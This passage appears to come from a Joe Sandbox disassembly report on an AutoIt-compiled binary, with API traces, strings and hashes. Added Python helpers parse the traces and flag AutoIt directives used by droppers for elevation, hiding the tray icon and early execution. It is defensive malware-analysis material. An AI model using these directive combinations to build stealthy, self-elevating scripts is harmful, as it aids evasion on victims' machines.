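    return sorted({a for c in calls for a in c.args if isinstance(a, str)})


# Constructed sample: API lines copied from several routines on this page.
SAMPLE_BLOCK = """\
APIs
• GetCursorPos.USER32(?), ref: 009149CA
• GetDesktopWindow.USER32 ref: 009149DF
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00914A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00914ABB
  • Part of subcall function 00892344: GetAsyncKeyState.USER32(00000001), ref: 00892399
• SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 008929FC
• _memset.LIBCMT ref: 00918C44
Strings
"""

if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_BLOCK)
    for c in parsed:
        print(f"{c.ref:08X} {c.module}!{c.func} args={c.args} subcall_of={c.subcall_of}")
    print(dict(summarize(parsed)), string_args(parsed))
```

Feeding a whole block to `parse_trace` and diffing `string_args` against the block's own `String ID` line is a cheap sanity check: strings listed there but never seen as an argument were found by the disassembler in the routine body, not resolved at a call site.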
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FAD1E
                                                                        • GetDriveTypeW.KERNEL32(?,0091FAC0,?,\\.\,0091F910), ref: 008FADFB
                                                                        • SetErrorMode.KERNEL32(00000000,0091FAC0,?,\\.\,0091F910), ref: 008FAF59
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: a61aa22b3d1b8010ee702e034afa8dff18a66b3dd04d899d2be43141575e27ae
                                                                        • Instruction ID: 9852c96ae5c7f3e15de6b89b811711bcc639a32b0e791e139ef85fbc29807f36
                                                                        • Opcode Fuzzy Hash: a61aa22b3d1b8010ee702e034afa8dff18a66b3dd04d899d2be43141575e27ae
                                                                        • Instruction Fuzzy Hash: B551B9F065420DEB8B18EB34D952CBE73E4FB487287244056E60BEB291DE719D41D763
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-86951937
                                                                        • Opcode ID: 86c28e64b7ad6cb5d562400f640dea7f23c48420e6c3cb7519c06733b80c4e28
                                                                        • Instruction ID: a4dfed875be1bee3b5dfe641acfdcb9f8f9358aa439d09ca91dac43bbdfc72ab
                                                                        • Opcode Fuzzy Hash: 86c28e64b7ad6cb5d562400f640dea7f23c48420e6c3cb7519c06733b80c4e28
                                                                        • Instruction Fuzzy Hash: 768117B16402196ACF21BB64EC42FAF37A8FF05714F080025F906EA296FF70DA65D656
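The string set above is the AutoIt preprocessor's directive table (`#include`, `#include-once`, `#cs`/`#ce`, `#comments-start`/`#comments-end`, `#notrayicon`, `#requireadmin`, `#OnAutoItStartRegister`, `#pragma compile`) together with its three parse errors; the only API is `__wcsnicmp`, so the names are matched case-insensitively as prefixes. The Python below is an added example, not AutoIt's or Joe Sandbox's code: a line-oriented directive scanner that mirrors that behaviour so a decompiled `.au3` script can be triaged for `#RequireAdmin` (UAC elevation), `#NoTrayIcon` (no visible tray icon) and `#OnAutoItStartRegister` (code that runs before the script body), and for its `#include` targets. Directive meanings follow the AutoIt documentation; which condition raises which of the three error strings, nesting of `#cs` blocks, and tolerating a stray `#ce` are assumptions of the example, and the sample script is constructed.

```python
"""Scan an AutoIt (.au3) script for preprocessor directives the way a line-based lexer would."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Directive names the lexer on this page compares case-insensitively (cf. __wcsnicmp).
# Descriptions follow the AutoIt documentation.
DIRECTIVES = {
    "include": "textually include another .au3 file",
    "include-once": "include the current file at most once",
    "notrayicon": "do not show the AutoIt tray icon (no visible sign the script runs)",
    "requireadmin": "re-launch the script elevated (UAC prompt)",
    "onautoitstartregister": "run the named function before the script body",
    "pragma": "compiler option, written #pragma compile(...)",
}
# Directives worth flagging when triaging a dropper: they change visibility or privilege.
NOTEWORTHY = {"notrayicon", "requireadmin", "onautoitstartregister"}

COMMENT_OPEN = re.compile(r"^#(cs|comments-start)\b", re.I)
COMMENT_CLOSE = re.compile(r"^#(ce|comments-end)\b", re.I)
DIRECTIVE = re.compile(r"^#([A-Za-z][A-Za-z-]*)(?:\s+(.*))?$")
INCLUDE_ARG = re.compile(r"""^(?:<(?P<sys>[^>]+)>|"(?P<dq>[^"]+)"|'(?P<sq>[^']+)')$""")

# Error strings as they appear in the binary; which condition raises which one is an
# assumption of this example.
ERR_SYNTAX = "Bad directive syntax error"
ERR_INCLUDE = "Cannot parse #include"
ERR_COMMENT = "Unterminated group of comments"


@dataclass
class Directive:
    line: int
    name: str   # lower-cased directive name
    arg: str    # raw text after the name ("" when none)


@dataclass
class ScanResult:
    directives: List[Directive] = field(default_factory=list)
    errors: List[Tuple[int, str]] = field(default_factory=list)

    def flagged(self) -> List[Directive]:
        return [d for d in self.directives if d.name in NOTEWORTHY]

    def includes(self) -> List[str]:
        """Include targets with their <>/""/'' delimiters stripped, in source order."""
        out = []
        for d in self.directives:
            if d.name == "include":
                m = INCLUDE_ARG.match(d.arg)
                out.append(m.group("sys") or m.group("dq") or m.group("sq"))
        return out


def scan_directives(source: str) -> ScanResult:
    res = ScanResult()
    depth, opened_at = 0, 0          # #cs blocks may nest; remember where the outermost opened
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if COMMENT_OPEN.match(line):
            if depth == 0:
                opened_at = no
            depth += 1
            continue
        if COMMENT_CLOSE.match(line):
            depth = max(depth - 1, 0)  # a stray #ce outside any block is tolerated here
            continue
        if depth or not line.startswith("#"):
            continue                   # inside a comment block, or ordinary code
        m = DIRECTIVE.match(line)
        name = m.group(1).lower() if m else ""
        if name not in DIRECTIVES:
            res.errors.append((no, ERR_SYNTAX))
            continue
        arg = (m.group(2) or "").strip()
        if name == "include" and not INCLUDE_ARG.match(arg):
            res.errors.append((no, ERR_INCLUDE))
            continue
        res.directives.append(Directive(no, name, arg))
    if depth:
        res.errors.append((opened_at, ERR_COMMENT))
    return res


# Constructed sample script exercising every directive and every error path.
SAMPLE_SCRIPT = """\
#NoTrayIcon
#RequireAdmin
#include <Crypt.au3>
#include "helpers.au3"
#cs
  dropper notes, never executed
  #cs
  nested block
  #ce
#ce
#OnAutoItStartRegister "Main"
#pragma compile(Out, payload.exe)
#bogus
#include helpers.au3
Local $x = 1
#cs
this block is never closed
"""

if __name__ == "__main__":
    r = scan_directives(SAMPLE_SCRIPT)
    for d in r.flagged():
        print(f"line {d.line}: #{d.name} {d.arg} -> {DIRECTIVES[d.name]}")
    print("includes:", r.includes())
    print("errors:", r.errors)
```

Run it over the script recovered from the compiled AutoIt binary (a decompiler dumps it as text) and check `flagged()` first: `#RequireAdmin` plus `#NoTrayIcon` in a sample that also drops a VBS into the startup folder is the combination to look for.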
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00919AD2
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00919B8B
                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00919BA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: 0
                                                                        • API String ID: 2326795674-4108050209
                                                                        • Opcode ID: a2bf8d235685e825aa9e6d13a7d0f4de1296203ee13d4c0a81052c368b62fca5
                                                                        • Instruction ID: 5cea27083ec26e9e6a19d5e08ddccf74b986c5bf9382f04ee5671f219914dce8
                                                                        • Opcode Fuzzy Hash: a2bf8d235685e825aa9e6d13a7d0f4de1296203ee13d4c0a81052c368b62fca5
                                                                        • Instruction Fuzzy Hash: 5102AD30308309AFD715CF15C868BEABBE9FF49314F04892DF599962A1C734D985DB92
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0091A903
                                                                        • SetTextColor.GDI32(?,?), ref: 0091A907
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0091A91D
                                                                        • GetSysColor.USER32(0000000F), ref: 0091A928
                                                                        • CreateSolidBrush.GDI32(?), ref: 0091A92D
                                                                        • GetSysColor.USER32(00000011), ref: 0091A945
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0091A953
                                                                        • SelectObject.GDI32(?,00000000), ref: 0091A964
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0091A96D
                                                                        • SelectObject.GDI32(?,?), ref: 0091A97A
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0091A999
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0091A9B0
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0091A9C5
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0091A9ED
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0091AA14
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0091AA32
                                                                        • DrawFocusRect.USER32(?,?), ref: 0091AA3D
                                                                        • GetSysColor.USER32(00000011), ref: 0091AA4B
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0091AA53
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0091AA67
                                                                        • SelectObject.GDI32(?,0091A5FA), ref: 0091AA7E
                                                                        • DeleteObject.GDI32(?), ref: 0091AA89
                                                                        • SelectObject.GDI32(?,?), ref: 0091AA8F
                                                                        • DeleteObject.GDI32(?), ref: 0091AA94
                                                                        • SetTextColor.GDI32(?,?), ref: 0091AA9A
                                                                        • SetBkColor.GDI32(?,?), ref: 0091AAA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: 66359dd5145d4e2ba14d7ca1e07b7dfb212f6ca5d347280fbe87d426a3584081
                                                                        • Instruction ID: bb85ed89ddfa79cdb9cfccf7e45d616f80cc0f25da2300d76165d37343f991eb
                                                                        • Opcode Fuzzy Hash: 66359dd5145d4e2ba14d7ca1e07b7dfb212f6ca5d347280fbe87d426a3584081
                                                                        • Instruction Fuzzy Hash: 57513B71A0520CFFDF119FA4DC48AEE7B79EF08320F218625F915AB2A1D7759940DB90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00918AC1
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00918AD2
                                                                        • CharNextW.USER32(0000014E), ref: 00918B01
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00918B42
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00918B58
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00918B69
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00918B86
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00918BD8
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00918BEE
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00918C1F
                                                                        • _memset.LIBCMT ref: 00918C44
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00918C8D
                                                                        • _memset.LIBCMT ref: 00918CEC
                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00918D16
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00918D6E
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00918E1B
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00918E3D
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00918E87
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00918EB4
                                                                        • DrawMenuBar.USER32(?), ref: 00918EC3
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00918EEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: 48ba60dd9516cd425942fbb50af8fc2def28d04b092e084f119f6e29542fbd1c
                                                                        • Instruction ID: 44c6c5483250c501d19c31d638ed4c2dcd93d08e971d7b57cc1fc53641244738
                                                                        • Opcode Fuzzy Hash: 48ba60dd9516cd425942fbb50af8fc2def28d04b092e084f119f6e29542fbd1c
                                                                        • Instruction Fuzzy Hash: 7CE16D70A0421CABDB20DF64CC84EEF7BB9FF09750F10815AF915AA291DB748981EF61
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 009149CA
                                                                        • GetDesktopWindow.USER32 ref: 009149DF
                                                                        • GetWindowRect.USER32(00000000), ref: 009149E6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00914A48
                                                                        • DestroyWindow.USER32(?), ref: 00914A74
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00914A9D
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00914ABB
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00914AE1
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00914AF6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00914B09
                                                                        • IsWindowVisible.USER32(?), ref: 00914B29
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00914B44
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00914B58
                                                                        • GetWindowRect.USER32(?,?), ref: 00914B70
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00914B96
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00914BB0
                                                                        • CopyRect.USER32(?,?), ref: 00914BC7
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00914C32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: 470d1389f69075318f2500e8daaa8e3b91f0ab9f19a4d22965b5162bd2e93b83
                                                                        • Instruction ID: 91668b106f368c349aaf25b1ef3a7ddff79cba56252571cfcedf78def98ddeb3
                                                                        • Opcode Fuzzy Hash: 470d1389f69075318f2500e8daaa8e3b91f0ab9f19a4d22965b5162bd2e93b83
                                                                        • Instruction Fuzzy Hash: 4CB18A71708344AFDB04DF68C845BAABBE8FF88714F00891CF5999B2A1D771E845CB96
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008F44AC
                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008F44D2
                                                                        • _wcscpy.LIBCMT ref: 008F4500
                                                                        • _wcscmp.LIBCMT ref: 008F450B
                                                                        • _wcscat.LIBCMT ref: 008F4521
                                                                        • _wcsstr.LIBCMT ref: 008F452C
                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008F4548
                                                                        • _wcscat.LIBCMT ref: 008F4591
                                                                        • _wcscat.LIBCMT ref: 008F4598
                                                                        • _wcsncpy.LIBCMT ref: 008F45C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 699586101-1459072770
                                                                        • Opcode ID: 7c8d1d7395a20b378af89a1432558324b8dc40fd8300f992e43c6473dec55d9c
                                                                        • Instruction ID: e7f7dc01fd3b6e9e0a9496900be8beb0156b73d60657836b2f241b90dcc458d8
                                                                        • Opcode Fuzzy Hash: 7c8d1d7395a20b378af89a1432558324b8dc40fd8300f992e43c6473dec55d9c
                                                                        • Instruction Fuzzy Hash: 7441DA3164020D7BEB10BB788C47EFF77ACFF46710F144566FA05E6282EA749A0196A6
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008928BC
                                                                        • GetSystemMetrics.USER32(00000007), ref: 008928C4
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008928EF
                                                                        • GetSystemMetrics.USER32(00000008), ref: 008928F7
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0089291C
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00892939
                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00892949
                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0089297C
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00892990
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 008929AE
                                                                        • GetStockObject.GDI32(00000011), ref: 008929CA
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 008929D5
                                                                          • Part of subcall function 00892344: GetCursorPos.USER32(?), ref: 00892357
                                                                          • Part of subcall function 00892344: ScreenToClient.USER32(009557B0,?), ref: 00892374
                                                                          • Part of subcall function 00892344: GetAsyncKeyState.USER32(00000001), ref: 00892399
                                                                          • Part of subcall function 00892344: GetAsyncKeyState.USER32(00000002), ref: 008923A7
                                                                        • SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 008929FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: b54489eda44262bb613f5c4ef56492abad4c1d27349f2004a70cf9869acee939
                                                                        • Instruction ID: 2dddb80c839c88de330eadd7665f1e1c09118e50ac2c3561ede0559c6ea9646d
                                                                        • Opcode Fuzzy Hash: b54489eda44262bb613f5c4ef56492abad4c1d27349f2004a70cf9869acee939
                                                                        • Instruction Fuzzy Hash: 95B17A71A0420AEFDF14EFA8DC55BAE7BB5FB08315F148129FA15E62A0DB74E840DB50
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 008EAF18
                                                                        • _wcscmp.LIBCMT ref: 008EAF29
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 008EAF51
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 008EAF6E
                                                                        • _wcscmp.LIBCMT ref: 008EAF8C
                                                                        • _wcsstr.LIBCMT ref: 008EAF9D
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 008EAFD5
                                                                        • _wcscmp.LIBCMT ref: 008EAFE5
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 008EB00C
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 008EB055
                                                                        • _wcscmp.LIBCMT ref: 008EB065
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 008EB08D
                                                                        • GetWindowRect.USER32(00000004,?), ref: 008EB0F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: 3c004bfd7e4b56da0c5ca72ef2f8d23bc65950823b07e86ad8aaf48381e37dec
                                                                        • Instruction ID: d2b35d480ec8a6e8c7faba0e00f5bcb3898c437777884b1667960cf612d68cc5
                                                                        • Opcode Fuzzy Hash: 3c004bfd7e4b56da0c5ca72ef2f8d23bc65950823b07e86ad8aaf48381e37dec
                                                                        • Instruction Fuzzy Hash: 8181BF7110828A9BDB05DF16C881BAB7BD8FF45724F048469FD85CA096DB30ED49CBA2
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: 848570a83de52683eeafe0501329ab012b49e972a63c17cd9a38c1f3dc018c5a
                                                                        • Instruction ID: 6bf5208c3e8d17eb7d78783f6b5e41f638c90b6ca596ecdb9d5230380064facc
                                                                        • Opcode Fuzzy Hash: 848570a83de52683eeafe0501329ab012b49e972a63c17cd9a38c1f3dc018c5a
                                                                        • Instruction Fuzzy Hash: CD317031A4824DAADA18FAA9DE43EFEB764FF11B18F640429B402F11D1EF616F04C653
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00905013
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0090501E
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00905029
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00905034
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0090503F
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0090504A
